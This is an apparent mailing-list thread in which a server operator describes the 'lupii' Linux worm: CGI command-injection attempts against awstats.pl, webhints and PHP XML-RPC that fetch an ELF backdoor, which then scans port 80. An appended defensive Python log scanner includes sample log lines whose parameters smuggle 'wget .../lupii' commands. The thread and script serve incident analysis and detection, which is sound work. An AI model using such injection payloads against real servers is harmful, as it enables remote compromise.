Hi,

I couldn't help it and I ran the program, of course with a sniffer on.

Syntax: lupii <IP_address_of_the_reporting_host>

Here's what I found:

1. runs on RedHat Enterprise Workstation 4
2. opens up udp:7222
3. exchanges some info with <IP_address_of_the_reporting_host> over udp 7222
4. remains active in the background
5. starts a SYN scan to port 80 on random destinations; in this particular example it used a class A address, keeping the first 2 octets unchanged and changing just the last 2 octets of the address, in order from X.Y.0.0 to X.Y.z.w.
6. it doesn't seem to be downloading anything from the Internet
7. it tries several ways to infect the scanned system, all based on CGI command execution/code injection: awstats.pl, webhints, xml-rpc for php etc. You can see all these if you look at the program code.

I stopped the program but I have the capture. Any news from anybody else?

Tudor

__________________

Hi again everyone,

Got the same thing a few minutes ago, coming from China this time, pointing to the same address for the download.... Seems to be spreading?

The downloaded file is definitely for Linux.

Tudor

__________________

Hi everyone,

Last night I caught an attack on my web servers here; the attack consisted of command execution attempts using various CGI vulnerabilities. The fact is that after looking at the payload of all connection attempts, they all had a "wget <IP Address>/lupii", same IP address; I can send it to the list if anybody needs it.

I downloaded the file from that site, it is an ELF executable and it seems to be a backdoor of some sort reporting back to the site. The attack was coming from Taiwan and the download site was in Norway.

I am not good at looking at ELF format programs, is anybody willing to take a look? I can send the file on demand.

Does anybody know what this is all about?

Thanks,
Tudor

_______________________________________________
http://lurker.clamav.net/list/clamav-users.html
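As an added defender's example, not part of the thread, here is a small Python script that scans web server access-log lines for the pattern Tudor describes: a CGI request whose URL-decoded payload carries a "wget <host>/lupii" fetch. It extracts the download host and file name as indicators and groups the attacking sources by download site, which is how the "same IP address for the download" observation would show up in logs. The log lines, IP addresses, script paths and parameter names are all constructed for the example.

```python
import re
from urllib.parse import unquote
from collections import defaultdict

# Constructed sample access-log lines (not from the original post). They mimic
# the CGI command-execution attempts described in the thread, each carrying a
# "wget <IP>/lupii" download instruction inside a request parameter.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Nov/2005:03:12:41 +0000] "GET /cgi-bin/awstats.pl?configdir=|wget%20198.51.100.9/lupii| HTTP/1.1" 404 289
203.0.113.7 - - [08/Nov/2005:03:12:42 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512
198.51.100.23 - - [08/Nov/2005:03:13:02 +0000] "GET /index.html HTTP/1.1" 200 1043
203.0.113.8 - - [08/Nov/2005:03:15:10 +0000] "GET /webhints/hints.pl?hint=;wget%20198.51.100.9/lupii; HTTP/1.1" 404 289
""".splitlines()

# Common Log Format: source, identity, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A fetch tool followed by a host (IP or name) and a path, e.g. "wget 198.51.100.9/lupii".
FETCH_RE = re.compile(r'\b(?P<tool>wget|curl)\s+(?:https?://)?(?P<host>[\w.\-]+)(?::\d+)?/(?P<path>[\w./\-]+)', re.I)

def decode_target(target):
    """URL-decode repeatedly so doubly-encoded payloads are not missed."""
    prev = None
    while prev != target:
        prev, target = target, unquote(target)
    return target

def find_download_attempts(lines):
    """Return one record per request whose decoded target contains a remote fetch."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_target(m['target'])
        f = FETCH_RE.search(decoded)
        if not f:
            continue
        hits.append({
            'src': m['src'], 'status': int(m['status']),
            'script': decoded.split('?', 1)[0],   # the CGI being targeted
            'tool': f['tool'].lower(), 'host': f['host'], 'file': f['path'].rsplit('/', 1)[-1],
        })
    return hits

def download_sites(hits):
    """Group flagged requests by download host; many sources sharing one host is the thread's pattern."""
    sites = defaultdict(set)
    for h in hits:
        sites[h['host']].add(h['src'])
    return {host: sorted(srcs) for host, srcs in sites.items()}
```

Run against real logs, the `host` and `file` fields are the values to block at the egress proxy and to search for in outbound connection logs from the web servers.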